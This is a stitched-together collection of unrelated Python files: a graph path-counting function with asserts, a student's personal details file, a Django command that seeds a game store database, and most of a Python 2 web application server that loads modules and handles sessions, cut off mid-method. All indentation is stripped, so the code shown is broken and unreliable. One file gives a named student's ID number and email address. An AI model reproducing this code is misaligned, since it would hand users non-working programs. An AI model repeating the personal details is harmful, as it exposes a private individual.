new_letter_counts[node[0]] = 0
new_letter_counts[node[0]] += 1
new_graph_path = GraphPath(new_nodes, new_letter_counts)
if node not in adjacency_map:
return [new_graph_path]
paths = list()
for child_node in adjacency_map[node]:
new_paths = get_max_value_string(
new_graph_path, child_node, adjacency_map)
paths.extend(new_paths)
return paths
def get_max_value_string_helper(graph_string, edge_list):
letter_counts = dict()
nodes = list()
for char in graph_string:
if char not in letter_counts:
letter_counts[char] = 0
else:
letter_counts[char] += 1
nodes.append("{}{}".format(char, letter_counts[char]))
# print(letter_counts)
print(nodes)
adjacency_map = dict()
for start, end in edge_list:
if nodes[start] not in adjacency_map:
adjacency_map[nodes[start]] = set()
if nodes[start] != nodes[end]:
adjacency_map[nodes[start]].add(nodes[end])
print(adjacency_map)
paths = list()
graph_path = GraphPath()
for node in adjacency_map:
new_paths = get_max_value_string(graph_path, node, adjacency_map)
paths.extend(new_paths)
max_value = 0
for path in paths:
max_path_value = max(path.letter_counts.values())
if max_path_value > max_value:
max_value = max_path_value
print(max_value)
return max_value if max_value > 0 else None
assert get_max_value_string_helper("ABACA", [(0, 1), (0, 2), (2, 3), (3, 4)]) == 3
assert not get_max_value_string_helper("A", [(0, 0)])
|
# Fill in your personal information in the variables below
name = "Gabriel Batista Albino Silva"
school_id = "16/0028361"
email = "160028361@aluno.unb.br"
|
import random
from django.core.management.base import BaseCommand
from imagefactory import create_image
from gamestore.tests.create_content import create_user, \
create_game, create_score, create_game_sale, create_category, GAME_TITLES, \
CATEGORY_TITLES
def create_users(amount):
for _ in range(amount):
yield create_user()
def create_games(amount, users, categories):
image_game = create_image(name='image', width=256, height=256)
image_icon = create_image(name='icon', width=48, height=48)
# TODO: Better titles
if users and categories:
for _ in range(amount):
yield create_game(
user=random.choice(users),
category=random.choice(categories),
title=random.choice(GAME_TITLES),
icon=image_icon,
image=image_game
)
def populate(user_amount, game_amount, sales_amount, scores_amount):
categories = tuple(map(create_category, CATEGORY_TITLES))
users = tuple(create_users(user_amount))
games = tuple(create_games(game_amount, users, categories))
sales = []
sales_dict = {}
if users and games:
for i in range(sales_amount):
user = random.choice(users)
game = random.choice(games)
bought = sales_dict.get(user, [])
if not bought:
create_game_sale(user, game)
sales.append((user, game))
sales_dict[user] = [game]
elif game not in bought:
create_game_sale(user, game)
sales.append((user, game))
                sales_dict[user].append(game)
if sales:
for i in range(scores_amount):
create_score(*random.choice(sales))
class Command(BaseCommand):
"""
    Manage.py command for populating the database with models for testing.
    Populates the database with data for testing. Uses *faker* for data
    generation. Usage:
.. code-block::
python manage.py populate_db
Resources:
.. [1] http://eli.thegreenplace.net/2014/02/15/programmatically-populating-a-django-database
"""
help = 'Populates database with data for testing the website.'
def add_arguments(self, parser):
parser.add_argument(
'--users',
dest='user_amount',
default=10,
type=int,
help='Amount of users to create.'
)
parser.add_argument(
'--games',
dest='game_amount',
default=2,
type=int,
help='Amount of games to create.'
)
parser.add_argument(
'--sales',
dest='sales_amount',
default=10,
type=int,
help='Amount of sales to create.'
)
parser.add_argument(
'--scores',
dest='scores_amount',
default=20,
type=int,
help='Amount of scores to create.'
)
def handle(self, *args, **options):
populate(
options['user_amount'],
options['game_amount'],
options['sales_amount'],
options['scores_amount'],
)
|
#!/pyenv/2.6/bin/python
import imp
import cProfile
import os
import config
from wsgi import webapp, locale
from util import instance_id_from_config
serverConfPath = config.path
webapp.configPath = serverConfPath
vodkaPath = os.path.abspath(os.path.join(os.path.dirname(__file__)))
import weakref
from pprint import pformat
from Cookie import SimpleCookie
import new
import md5
import signal
import base64
import ConfigParser
import urllib
import re
import twentyc.database
import twentyc.vodka.tools.module_manager
import tmplbridge
import session
import task as vodkatask
import traceback
import random
import logging, logging.handlers
import time
import smtplib
import errno
import socket
import operator
from constants import *
import sys
import types
import simplejson as jsonlib
import threading
import copy
from threading import Thread
from twentyc.tools.syslogfix import UTFFixedSysLogHandler
import random
import inspect
import validator
from wsgi.server import *
try:
import xbahn
except ImportError:
print "Warning, xbahn module not installed, no xbahn support"
xbahn = None
import subprocess
import bartender
import twentyc.database.tools
if xbahn:
# set up xbahn topic config
xbahn.topic_instructions["^__U\..+\.notify$"] = {
"discard_data" : True
}
# remove unretrieved task results after n seconds
TASK_CLEANUP_MARGIN = 60
# remove unfinished task after n seconds
TASK_TIMEOUT_MARGIN = 600
# remove unfinished task if it has stopped sending for n seconds
TASK_SILENCE_MARGIN = 60
# max concurrent tasks per session
TASK_SESSION_CAP = 3
# import this to make this file runable with twistd
#from wsgi.uwsgi_server import *
##############################################################################
# Functions
###############################################################################
# Turn list of objects into a key => value dict
#def map(d, keyName='id', valueName='name', setNone=False):
# r = {}
# for k,v in d.items():
# r.setdefault(getattr(v, keyName), getattr(v, valueName))
# if setNone == True:
# r.setdefault('0', 'None')
# return r
def dbg(msg):
print "Vodka: %s" % msg
def dict_equal(a, b):
for k,v in b.items():
if a.get(k) != v:
return False
return True
def obj_equal(a, b):
if not a and b:
return False
elif not b and a:
return False
return dict_equal(a.__dict__, b.__dict__)
#############################################################################
# check if app environment is production
def is_production():
env = serverConf.get("environment", "production")
if env == "production":
return True
else:
return False
def row2dict(row):
d = {}
for columnName in row.keys():
d[columnName] = getattr(row, columnName)
if hasattr(d[columnName], "strftime"):
d[columnName] = int(d[columnName].strftime("%s"))
return d
################################################################################
# load error page
errorPage = None
################################################################################
# error handler function
def error_handler(code, message, traceback, env, config):
"""
error handler function that will take care of displaying
http error pages (404, 500 etc.)
if server env is set to production error pages will now show
a traceback
"""
try:
raise
except webapp.UploadSizeException:
ses = env.get("request").get("session").data.get("client_session")
ses.error("Uploaded file too big", True)
except:
pass
if code in [404]:
message += ": %s" % env.get("PATH_INFO", "")
if code not in [401]:
webapp.log.debug("(%d) %s\n%s" % (code, message, traceback))
if is_production():
traceback = ''
if code in [503]:
        f = open("htdocs/503/index.html", "r")
html = f.read()
f.close()
return html % {
"errormsg" : serverConf.get("503_error_msg", "Out of Service"),
"errormsg_apology" : serverConf.get("503_error_apology", "We apologize for any inconvenience. Please check back soon!")
}
else:
global errorPage
if not errorPage:
f = open('htdocs/error.html', 'r')
errorPage = f.read()
f.close()
return errorPage % {
"status" : str(code), "message" : message, "traceback": traceback
}
webapp.error_handler = error_handler
###############################################################################
def format_path(path, request):
"""
format a path to handle correct brand selection
"""
ses = request["session"].data.get("client_session")
if ses:
brand = ses.brand
#print "Using brand %s" % (str(brand))
path = path.replace("__BRAND__", brand.get("dir"))
return path
webapp.format_path = format_path
# defines the order in which modules should be loaded on the client
module_js_load_order =[]
# defines the order in which modules should be loaded on the server
module_py_load_order = []
# holds the python components loaded from vodka modules (as python modules)
# indexed by modulname and component name
module_py_components = {}
from rpc import *
from datetime import datetime, timedelta
###############################################################################
# load pref validators from disk
validators_path = os.path.join(os.path.dirname(inspect.getfile(twentyc.vodka)), "data", "validators")
if os.path.exists(validators_path):
for validator_file in os.listdir(validators_path):
if re.match("^.+\.json$", validator_file):
validator.add_from_file(os.path.join(validators_path,validator_file))
###############################################################################
# Classes
###############################################################################
class VodkaAppThread(Thread):
"""
Extends threading.Thread
Example:
t = VodkaAppThread(my_func)
t.start("some text")
will call my_func("some text") in its own thread
"""
def __init__(self, callback):
"""
Init and set callback function, the callback function
will be executed on run()
"""
Thread.__init__(self)
self.callback = callback
def run(self):
self.callback(*self.runArgs)
del self.callback
del self.runArgs
def start(self, *args):
"""
Set the arguments for the callback function and start the
thread
"""
self.runArgs = args
Thread.start(self)
###############################################################################
# VodkaApp
###############################################################################
class VodkaApp(webapp.BaseApp):
"""
The main vodka application
Also handles page rendering
"""
#############################################################################
# Initialize object
def __init__(self, clientClass=None):
"""
Initialize the App
clientClass can be set if you want client pool to spawn an object
different to VodkaClient
"""
self.config = config = webapp.dict_conf(serverConfPath)
self.mcfg = self.config.get("modules")
self._Client = clientClass or VodkaClient
self.is_production = is_production()
self.session_map = {}
self.templates = {}
self.id = instance_id_from_config(self.config.get("server",{}))
#self.id = self.config.get("server",{}).get("vodka_id",
# str(md5.new("%s-%s" % (socket.gethostname(), uwsgi.opt.get("socket"))).hexdigest())[:8]
#)
if self.config.get("profiler",{}).get("wsgi") == "yes":
self.toggle_profile_requests(state="on")
# status
self.http_requests = 0
self.http_requests_prev = 0
self.http_requests_total = 0
self.http_request_time = 0
self.app_status = 0
# load app config
self.serverConfig = serverConf
self.pathRoot = self.config.get("server",{}).get("root", "/")
self.locationConfig = self.config.get("locations", {
"js" : "base/js",
"css" : "base/css",
"libs" : "base/libs"
})
self.statusKey = self.config.get("app", {}).get("status_key", None)
# set up version based dispatch
pathCfg = self.config.get("path", {})
for path, dest in pathCfg.items():
webapp.url_map.append(["/%s%s" % (version, path), dest])
self.debugging = (self.config.get("app", {}).get("debugging", "no") == "yes")
# set up profiling
profile_conf = self.config.get("profiler", {})
if profile_conf.get("enabled") == "yes":
self.profiling = True
self.profiling_path = profile_conf.get(
"output.path",
os.path.join(
os.path.dirname(__file__),
"profile",
"%s.profile" % ("%s."+str(int(time.time())))
)
)
else:
self.profiling = False
self.profiling_path = None
if profile_conf.get("wsgi") == "yes":
self.profiling_wsgi = True
else:
self.profiling_wsgi = False
# set up logging
log = webapp.log
if is_production() or int(self.config.get("server",{}).get("syslog",0)):
syslog_address = self.config.get("server", {}).get("syslog_address", "/dev/log")
syslog_facility = self.config.get("server", {}).get("syslog_facility", "LOG_LOCAL0")
print "Using syslog to log error messages (address:%s) (facility:%s)" % (syslog_address, syslog_facility)
hdl = UTFFixedSysLogHandler(address=syslog_address, facility=getattr(logging.handlers.SysLogHandler, syslog_facility))
hdl.setFormatter(logging.Formatter(" Vodka %(message)s"))
else:
hdl = logging.FileHandler("error.log")
hdl.setFormatter(logging.Formatter("%(asctime)s - vodka %(message)s"))
log.addHandler(hdl)
self.log = log
try:
# load grant permissions list from config
self.grant_permissions = self.config.get("grant_permissions", {})
for name, perms in self.grant_permissions.items():
t = perms
p = 0
if "r" in t:
p |= 0x01
if "w" in t:
p |= 0x02
if "x" in t:
p |= 0x04
self.grant_permissions[name] = p
self.info("GRANTING EVERYONE PERMISSION to %s at level %d" % (name, p))
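# Permission strings from the [grant_permissions] config section are collapsed into a
# bitmask: "r" -> 0x01, "w" -> 0x02, "x" -> 0x04. For example (hypothetical config):
#   [grant_permissions]
#   public.news : rw
# would grant everyone level 0x03 (read | write) on "public.news".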
# load brand and theme map from dispatch
self.load_dispatch()
# connect database client
self.couch_engine = serverConf.get("couch_engine", "couchdb")
self.couch_config = self.config.get(self.couch_engine, {})
self.info("Using database: %s" % self.couch_engine)
if not self.couch_config:
raise Exception("Attempted to use couch-engine: %s for preferences, but found no config section for it" % self.couch_engine)
design_path = os.path.join(os.path.dirname(inspect.getfile(twentyc.vodka)), "data", "design")
self.info("Making sure designs are up to date, reading from %s ..." % design_path)
for design_file in os.listdir(design_path):
twentyc.database.tools.update_views(
self.couch_engine,
self.couch_config,
os.path.join(design_path, design_file)
)
self.db_prefs = twentyc.database.ClientFromConfig(
self.couch_engine,
self.couch_config,
"prefs",
logger=self.log
)
pref_limits = self.config.get("pref_limits", {})
if not pref_limits.has_key("color_theme"):
raise Exception("Missing pref limit for color themes, add in section [pref_limits], color_theme : n")
if not pref_limits.has_key("layout"):
raise Exception("Missing pref limit for layout, add in section [pref_limits], layout : n")
for doctype, limit in pref_limits.items():
prefs.document_limits[doctype] = int(limit)
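# The [pref_limits] section is expected to map a preference document type to the
# maximum number of documents a user may store, e.g. (illustrative values):
#   [pref_limits]
#   color_theme : 10
#   layout : 25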
# connect vodka module manager
self.module_manager = twentyc.vodka.tools.module_manager.ModuleManager(
logger=self.log
)
self.db_modules = twentyc.database.ClientFromConfig(
self.couch_engine,
self.couch_config,
"modules",
logger=self.log
)
self.module_manager.set_database(self.db_modules)
# stores module data for easy access,
# version, status, mobile, dependencies and whether the
# were loaded from disk or database
self.module_status = {}
self.module_status_time = 0
self.module_js_load_order = module_js_load_order
self.module_py_load_order = module_py_load_order
# load modules from disk
self.load_modules_from_disk()
# load modules from database.
self.load_modules()
self.update_modules()
if self.config.get("module_load_order"):
load_order = self.config.get("module_load_order",{})
self.module_js_load_order = sorted(self.module_js_load_order, key=lambda obj:load_order.get(obj, "99"))
# load unload tools js and store it
f = open("htdocs/js/twentyc.unloadtools.js", "r")
self.unload_tools_code = f.read()
f.close()
# extend from modules if needed
self.modules = module_py_components
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'extend_vodka'):
self.info("%s is extending application" % name)
mod.extend_vodka(self, VodkaApp);
# bind rpc
from rpc import RPC
self.rpc_json = RPC(RPC_OUTPUT_JSON, self)
self.rpc_json.exposed = True
self.rpc_static = RPC(RPC_OUTPUT_STATIC, self)
self.rpc_static.exposed = True
# connect xbahn
self.storage = {}
self.xbahn = None
if xbahn:
xbahn_connect = VodkaAppThread(self.connect_xbahn)
xbahn_connect.start()
# connect client pool
self.client_pool = ClientPool(
int(self.config.get("app", {}).get("client_pool.size", 20)),
self
)
# tasks will be stored here
self.tasks = {}
self.taskCleanupMargin = int(self.config.get("tasks", {}).get("cleanup_margin", TASK_CLEANUP_MARGIN))
self.taskTimeoutMargin = int(self.config.get("tasks", {}).get("timeout_margin", TASK_TIMEOUT_MARGIN))
self.taskSilenceMargin = int(self.config.get("tasks", {}).get("silence_margin", TASK_SILENCE_MARGIN))
self.taskSessionCap = int(self.config.get("tasks", {}).get("session_cap", TASK_SESSION_CAP))
task_cleanup = VodkaAppThread(self.task_cleanup_worker)
task_cleanup.start()
self.lib_includes_js = self.config.get("includes",{}).get("js","")
if self.lib_includes_js:
if type(self.lib_includes_js) == str:
self.lib_includes_js = self.lib_includes_js.split(",")
else:
self.lib_includes_js = []
# make sure core lib is always loaded (it's tiny)
if "base/js/twentyc.core.js" not in self.lib_includes_js:
self.lib_includes_js.insert(0, os.path.join(self.locationConfig.get("js"), "twentyc.core.js"))
self.lib_includes_css = self.config.get("includes",{}).get("css","")
if self.lib_includes_css:
if type(self.lib_includes_css) == str:
self.lib_includes_css = self.lib_includes_css.split(",")
else:
self.lib_includes_css = []
self.info("%d templates initialized" % (len(self.templates.keys())))
self.info("Running on vodka %s (instance id: %s from %s)" % (version, self.id, socket.gethostname()))
self.start()
except Exception, inst:
self.log.debug(str(inst)+"\n"+traceback.format_exc())
raise
#############################################################################
def start(self):
self.app_status = 1
t_run = VodkaAppThread(self.run)
t_run.start()
#############################################################################
def run(self):
while self.app_status == 1:
self.update_modules();
time.sleep(1)
#############################################################################
def stop(self):
self.app_status = 10
self.logout_all_sessions()
self.tasks_terminate()
if self.xbahn:
self.xbahn.stop()
#############################################################################
def connect_db(self, id):
setattr(self, "%s_db" % id, twentyc.database.ClientFromConfig(
self.couch_engine,
self.config.get(id),
id,
logger=self.log
))
#############################################################################
def connect_xbahn(self):
xbahn_config = self.config.get("xbahn")
if xbahn_config and xbahn:
self.xbahn = xbahn.xBahnThread(
xbahn_config.get("host"),
xbahn_config.get("port"),
xbahn_config.get("exchange"),
self,
self.storage,
username = xbahn_config.get("username"),
password = xbahn_config.get("password"),
queue_name = xbahn_config.get("queue_id","vodka"),
queue_capacity = int(xbahn_config.get("queue_capacity", 50)),
log=self.log
)
self.xbahn.start()
self.module_manager.xbahn_set(self.xbahn)
self.xbahn.set_limits(self.config.get("xbahn_limits",{}))
self.xbahn.listen("__U.*.notify")
# set up required topics
tpc_vodka_ctrl = self.xbahn.listen("__vodka.control.*")
if tpc_vodka_ctrl:
tpc_vodka_ctrl.callbacks.append(self.vodka_control_handler)
tpc_vodka_xb_req = self.xbahn.listen("__vodka.%s.request" % self.id)
if tpc_vodka_xb_req:
tpc_vodka_xb_req.callbacks.append(self.vodka_xbahn_request_handler)
tpc_vodka_xb_req = self.xbahn.listen("__vodka.ALL.request")
if tpc_vodka_xb_req:
tpc_vodka_xb_req.callbacks.append(self.vodka_xbahn_request_handler)
tpc_task_info = self.xbahn.listen("__vodka-task-update.%s.*" % self.id)
tpc_task_info.config.update(
{
"storage_handler" : self.task_update_receiver
}
)
self.info("Cleaning up any previous tasks that may still be lingering around")
self.xbahn.send(None, "__vodka-task-ctrl.%s._ALL_" % self.id, {
"cmd" : "stop"
})
# see if any of the loaded mods need to init something
# on xbahn
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'xbahn_init'):
self.info("%s is hooking into xbahn" % name)
mod.xbahn_init(self, self.xbahn);
else:
self.xbahn = None
#############################################################################
def vodka_xbahn_request_handler(self, msg, data):
cmd = data.get("cmd")
print "Got XBAHN request: %s" % data
try:
if cmd == "request.ping":
self.xbahn.respond(msg,
{
"result" : {
"id" : self.id,
"pid" : os.getpid(),
"host" : uwsgi.opt.get("socket"),
"xbahn" : self.xbahn.conn_str
}
}
)
elif cmd == "request.status":
self.xbahn.respond(msg, {
"result" : self.status_json()
})
else:
kwargs = data.get('kwargs',{})
type = kwargs.get('type')
if type:
cmd = "%s_%s" % (cmd, type)
if not hasattr(self, cmd):
raise Exception("Unknown command: %s" % cmd)
fn = getattr(self, cmd)
if not fn.xrh_exposed:
raise Exception("Command %s is not exposed to the xbahn request handler" % cmd)
rdata = { "result" : fn(**kwargs) }
self.xbahn.respond(msg, rdata);
except Exception, inst:
self.xbahn.respond(msg, { "status" : "ERR", "alert" : "Vodka Threw Exception(%s): %s" % (inst.__class__.__name__, str(inst))})
webapp.log.error(traceback.format_exc())
#############################################################################
def vodka_control_handler(self, msg, data):
if msg.subject == "__vodka.control.require_session_map":
# something requires a full update of the session mapping
self.xbahn.send(
None, "__vodka.update.session_map", self.session_map
)
elif msg.subject == "__vodka.control.reload_modules_for_client":
self.client_reload_modules(
data.get("user_id"),
data.get("modules")
)
elif msg.subject == "__vodka.control.unload_modules_for_client":
self.client_unload_modules(
data.get("user_id"),
data.get("modules")
)
#############################################################################
def client_reload_modules(self, user_id, modules):
sessions = self.sessions_by_user_id(user_id)
for ses in sessions:
if modules:
old_perms = ses.module_perms
ses.reload_20c_module_perms()
for mod, perms in modules.items():
if ses.check_20c_module(mod) and not self.module_manager.perms_check(old_perms, mod):
self.log.info("User %s gained access to module %s" % (user_id, mod))
ses.rce_require(
"reload.%s" % mod,
"\n".join([
"TwentyC.Modules.Load('%s', '%s');" % (mod, self.module_version(mod))
])
)
else:
old_perms = ses.module_perms
ses.reload_20c_module_perms()
modules = self.update_modules()
for mod, info in modules.items():
if info.get("access_level", 0) == 0:
continue
if not self.module_manager.perms_check(old_perms, mod):
if ses.check_20c_module(mod):
self.log.info("User %s gained access to module %s" % (user_id, mod))
ses.reload_20c_module(mod, self.module_version(mod))
elif not ses.check_20c_module(mod):
self.log.info("User %s lost access to module %s" % (user_id, mod))
ses.unload_20c_module(mod)
ses.rce_require("reload_perms_to_client", "TwentyC.Modules.LoadModulePerms();")
#############################################################################
def client_unload_modules(self, user_id, modules):
sessions = self.sessions_by_user_id(user_id)
for ses in sessions:
ses.reload_20c_module_perms()
for mod, perms in modules.items():
if not ses.check_20c_module(mod):
self.log.info("User %s lost access to module %s" % (user_id, mod))
ses.unload_20c_module(mod)
ses.rce_require("reload_perms_to_client", "TwentyC.Modules.LoadModulePerms();")
#############################################################################
def sessions_by_user_id(self, user_id):
try:
rv = []
for sid, ses in webapp.sessionCache.items():
cl_ses = ses.data.get("client_session")
if cl_ses and cl_ses.auth_id == user_id:
rv.append(cl_ses)
return rv
except Exception, inst:
self.log_error(inst)
#############################################################################
def log_error(self, err):
self.log.error(str(err))
self.log.error(traceback.format_exc())
#############################################################################
def dbg(self, msg):
msg = "Vodka: %s" % msg
print msg
self.log.debug(msg)
#############################################################################
def info(self, msg):
msg = "Vodka: %s" % msg
print msg
self.log.info(msg)
#############################################################################
def module_version(self, name):
#if not is_production():
# return time.time()
return self.update_modules().get(name, {}).get("version", version)
#############################################################################
def list_modules(self):
return self.module_js_load_order
#############################################################################
def modules_at_path(self, dir):
"""
returns a dict of valid vodka modules (name -> path) that exist at the given path
"""
rv = {}
for mod in os.listdir(dir):
if mod[0] in [".","_"] or mod in ["config"]:
continue
path = os.path.join(dir,mod)
if not os.path.isdir(path):
continue
rv[mod] = path
return rv
#############################################################################
def is_module_loaded(self, modid):
"""
Returns whether the specified module has been loaded from any source
"""
return self.module_status.get(modid,{}).get("source")
#############################################################################
def load_modules_from_disk(self):
# see what directories to scan for modules
dirs = self.config.get("module_directories", {})
all_instructions = {}
# preload module instructions for all module sources specified in the config
for name, dir in dirs.items():
# read module instructions
instructions_path = os.path.join(dir, "vodka_import.json")
if not os.path.exists(dir):
self.info("Specified module directory for '%s': %s DOES NOT EXIST" % (name, dir))
continue
if not os.path.exists(instructions_path):
self.info("No module instructions found for %s, skipping" % dir)
continue
f = open(instructions_path, "r")
instructions = jsonlib.loads(f.read())
f.close()
# make sure a module name space is defined in the instructions
namespace = instructions.get("namespace")
if not namespace:
self.info("No module namespace defined in %s, skipping" % instructions_path)
continue
all_instructions[name] = instructions
for mod, path in self.modules_at_path(dir).items():
self.module_status["%s.%s" % (namespace, mod)] = {
"path" : path
}
self.disk_module_instructions = all_instructions
# load modules from all directory sources specified in the config
for name, dir in dirs.items():
# only proceed if there are module instructions in the directory
instructions = all_instructions.get(name)
if not instructions:
continue
namespace = instructions.get("namespace")
# require global module dependencies specified in the instructions
# if any
if instructions.get("_dependencies"):
for dep in instructions.get("_dependencies"):
self.load_module_dependency(dep, "%s modules" % namespace)
# cycle through directories in the source location, and load
# any valid vodka module we find
for mod, path in self.modules_at_path(dir).items():
mod_id = "%s.%s" % (namespace, mod)
# load the module from the disk
if os.path.isdir(path):
self.load_module_from_disk(mod_id, path, instructions)
#############################################################################
def load_module_dependency(self, mod_id, reason=""):
# if module is already loaded from elsewhere, bail
if self.is_module_loaded(mod_id):
return
path = self.module_status.get(mod_id, {}).get("path")
if path:
# module is loaded from disk
if not self.is_module_loaded(mod_id):
self.info("Loading dependency from disk: %s from %s for %s" % (mod_id, path, reason))
self.load_module_from_disk(
mod_id,
path,
self.disk_module_instructions.get(mod_id.split(".")[0])
)
else:
# module is loaded from database
rv = self.load_module(mod_id)
if not rv:
raise Exception("Could NOT load module dependency: %s for %s" % (mod_id, reason))
else:
self.info("Loading dependency from couchdb: %s for %s" % (mod_id, reason))
#############################################################################
def load_module_from_disk(self, mod_id, path, instructions):
"""
Load the specified module from disk
"""
# if module is already loaded from elsewhere, bail
if self.is_module_loaded(mod_id):
return
a = mod_id.split(".")
namespace = a[0]
mod = ".".join(a[1:])
# get loading instructions for module
mod_instructions = instructions.get(mod, {})
# dependencies of this module
dep = mod_instructions.get("dependencies",[])
# dont load the module if its disabled via config
if self.mcfg.get(mod_id) == "disabled" or self.mcfg.get(namespace) == "disabled":
return
# load dependency modules
if dep:
for d in dep:
self.load_module_dependency(d, mod_id)
js = ""
namespace = mod_id.split(".")[0]
has_js = False
if os.path.isdir(path):
self.info("Loading module from directory: %s, %s" % (mod_id,path))
# add module to module status
self.module_status[mod_id] = {
"version" : instructions.get("version", version),
"access_level" : int(mod_instructions.get("access_level", 0)),
"dependencies" : dep,
"status" : 1,
"source" : "disk",
"path" : path,
"mobile" : mod_instructions.get("mobile",False)
}
# load preferences validators for this module
if os.path.exists(os.path.join(path, "prefs.json")):
validator.add_from_file(os.path.join(path,"prefs.json"))
# load template components of this module
if os.path.exists(os.path.join(path, "tmpl")):
tmpl_path = os.path.join(path, "tmpl")
for file in os.listdir(tmpl_path):
if file[0] == ".":
continue
tmpl_file_path = os.path.join(tmpl_path, file)
if os.path.isdir(tmpl_file_path):
# themed template
for t_file in os.listdir(tmpl_file_path):
if t_file[0] == ".":
continue
self.templates["%s.%s.%s" % (mod_id,file,t_file)] = [os.path.join(tmpl_file_path, t_file), "r"]
else:
# themeless template
self.templates["%s.%s" % (mod_id, file)] = [tmpl_file_path, "r"]
# load python components of this module
for file in os.listdir(path):
if re.match(".*\.py$", file) and file not in ["__init__.py"]:
mod_path = os.path.join(path, file)
f = open(mod_path, "r")
code = f.read()
f.close()
mod_sysid = re.sub("[^a-zA-Z0-9_]","_",mod_id)
pymod = imp.new_module(mod_sysid)
sys.modules[mod_sysid] = pymod
exec code in pymod.__dict__
module_py_components[mod_id] = pymod
module_py_load_order.append(mod_id)
elif re.match(".*\.js$", file) and not re.match("^_min_\.", file) and not file in twentyc.vodka.tools.module_manager.javascript_parts:
self.module_status[mod_id]["path_js"] = os.path.join(path, file)
has_js = True
if has_js:
module_js_load_order.append(mod_id)
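# Sketch of the vodka_import.json instructions file this loader expects at the root of
# a module directory (field names are taken from the code above, values are hypothetical):
#   {
#     "namespace" : "example",
#     "version" : "1.0.0",
#     "_dependencies" : ["example.base"],
#     "mymodule" : {
#       "dependencies" : ["example.base"],
#       "access_level" : 1,
#       "mobile" : false
#     }
#   }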
#############################################################################
def load_modules(self):
"""
Load modules using the vodka module manager connected to a database
(database, couchdb)
"""
t1 = time.time()
if self.module_manager:
man = self.module_manager
try:
modules = man.module_index().get("modules")
except Exception,inst:
self.info("!!!!!!! Did you forget to run cli/update_design.py after your last vodka update?")
raise
for name, data in modules.items():
if self.mcfg.get(name) != "disabled":
self.load_module(name)
print "Modules loaded from database in %.5f" % (time.time() - t1)
#############################################################################
def load_module(self, name):
"""
load the specified vodka module using the module manager
"""
if not self.module_manager:
return
mod_id = name
man = self.module_manager
a = name.split(".")
namespace = a[0]
mod_name = ".".join(a[1:])
# if module namespace is disabled in config, bail
if self.mcfg.get(namespace) == "disabled" or self.mcfg.get(mod_id) == "disabled":
return
info = man.module_info(namespace, mod_name)
if info:
# if module has already been loaded from disk, give priority to that
# and skip this.
if self.is_module_loaded(name):
return True
# if module has dependencies, load those first - assuming they haven't been loaded yet
if info.get("dependencies"):
for dependency in info.get("dependencies"):
self.load_module_dependency(dependency, name)
# if not self.is_module_loaded(dependency):
# print "Dependency for %s: %s" % (name, dependency)
# self.load_module(dependency)
self.info("Loading module from %s: %s" % (self.couch_engine, name))
# make entry in module_status
self.module_status[mod_id] = {
"version" : info.get("version"),
"access_level" : int(info.get("access_level", 0)),
"dependencies" : info.get("dependencies", []),
"source" : "manager",
"status" : info.get("status"),
"path" : None,
"mobile" : info.get("mobile", False)
}
# module info is loaded, import any module components of it
imports = man.module_import(namespace, mod_name)
for comp_name,mod in imports.items():
mod._module_from_database = name
module_py_components["%s.%s"%(name, comp_name)] = mod
module_py_load_order.append("%s.%s"%(name, comp_name))
# load templates
self.templates.update(man.module_templates(namespace, mod_name))
# load validator json for this module
validator_code = man.module_validator_code(namespace, mod_name)
if validator_code:
validator.add_from_json(validator_code)
module_js_load_order.append(mod_id)
return True
else:
self.info("No valid module data found for %s, skipping" % name)
return False
#############################################################################
# load brands from dispatch.conf
def load_dispatch(self):
"""
load dispatch config (brands, locale etc) so they can later
be picked by the sessions
"""
# load dispatch config
config = self.config
self.brand = {}
self._brand_map = {}
self._locale = {}
self._theme_map = {}
# load default brand
self.brand["default"] = dict(config.get("brand.default"))
self.brand["default"]["locale"] = self.get_locale(self.brand["default"]["lang"])
self.brand["default"]["name"] = "default"
def init_brand(brand):
section = "brand." + brand
bd = dict(self.brand["default"])
if config.has_key(section):
print "loading " + section
for k,v in config.get(section).items():
bd[k] = v
bd["locations"] = config.get(section).get("locations","")
if bd["locations"]:
bd["locations"] = bd["locations"].split(",")
if not os.path.isdir(bd["dir"]):
raise Exception("Brand directory not found: %s (absolute path required)" % bd["dir"])
bd["name"] = brand
bd["locale"] = self.get_locale(bd["lang"])
webapp.url_map.append(
("/%s-favicon.ico" % brand, "%s/htdocs/favicon.ico" % bd["dir"]),
)
webapp.url_map.append(
("/%s/brands/%s" % (version, brand), "%s/htdocs" % bd["dir"], "%s/htdocs" % self.brand["default"].get("dir"))
)
return bd
init_brand("default")
for brand,regex in config.get("brand_map").items():
self._brand_map[brand] = re.compile(regex)
self.brand[brand] = init_brand(brand)
#for k,v in self.brand.items():
# print "FF " + k + " : " + str(v)
for name, regex in config.get("theme_map").items():
self._theme_map[name] = re.compile(regex)
#############################################################################
def prepare_request(self, request, environ):
"""
prepare request
unlike handle_request this is fired before path dispatch
"""
ses = self.get_session(request)
#############################################################################
# handle request
def handle_request(self, request, environ):
"""
handle incoming http request
sets the request property of the user's session
"""
ses = self.get_session(request)
csrf = webapp.get_cookie(request, "csrftoken");
if not csrf:
secure = (self.config.get("session").get("cookie_secure", "no") == "yes")
csrfCookie = SimpleCookie()
csrfCookie['csrftoken'] = str(webapp.uuid.uuid4()).replace('-', '')
csrfCookie['csrftoken']['path'] = "/"
if secure:
csrfCookie['csrftoken']['secure'] = True
request['cookies_out']["csrftoken"] = csrfCookie;
self.http_requests += 1
self.http_requests_total += 1
############################################################################
# clean up request
def cleanup_request(self, request, environ):
return
#############################################################################
# get session object
def get_session(self, request):
"""
Return the session object for the user making the request
"""
sesContainer = request.get("session")
#print "Using session " + str(sesContainer.id)
if not sesContainer.data.has_key("client_session"):
sesContainer.data["client_session"] = session.Session(self, request, sesContainer.id)
return weakref.proxy(sesContainer.data.get("client_session"))
##############################################################################
def template_response(self, name, **kwargs):
req = kwargs.get("__request")
ses = self.get_session(req)
return ses.tmpl(name, request=req, **kwargs)
##############################################################################
def extend(self, name, method):
setattr(self, name, new.instancemethod(method, self, VodkaApp))
##############################################################################
def get_locale(self, lang):
# ref locale objects
if lang not in self._locale:
self._locale[lang] = locale.Locale(lang)
self._locale[lang].htmlescape()
return self._locale[lang]
##############################################################################
def authed_session(self, request):
"""
check if the request holds an authenticated session object
Return session object on success else
raise a HTTPRedirect to the login page
"""
ses = self.get_session(request)
if ses.is_authed():
return ses
##############################################################################
def update_modules(self):
now = time.time()
if not self.module_status_time or now-self.module_status_time > 10:
self.module_status_time = now
s = self.module_manager.module_index()
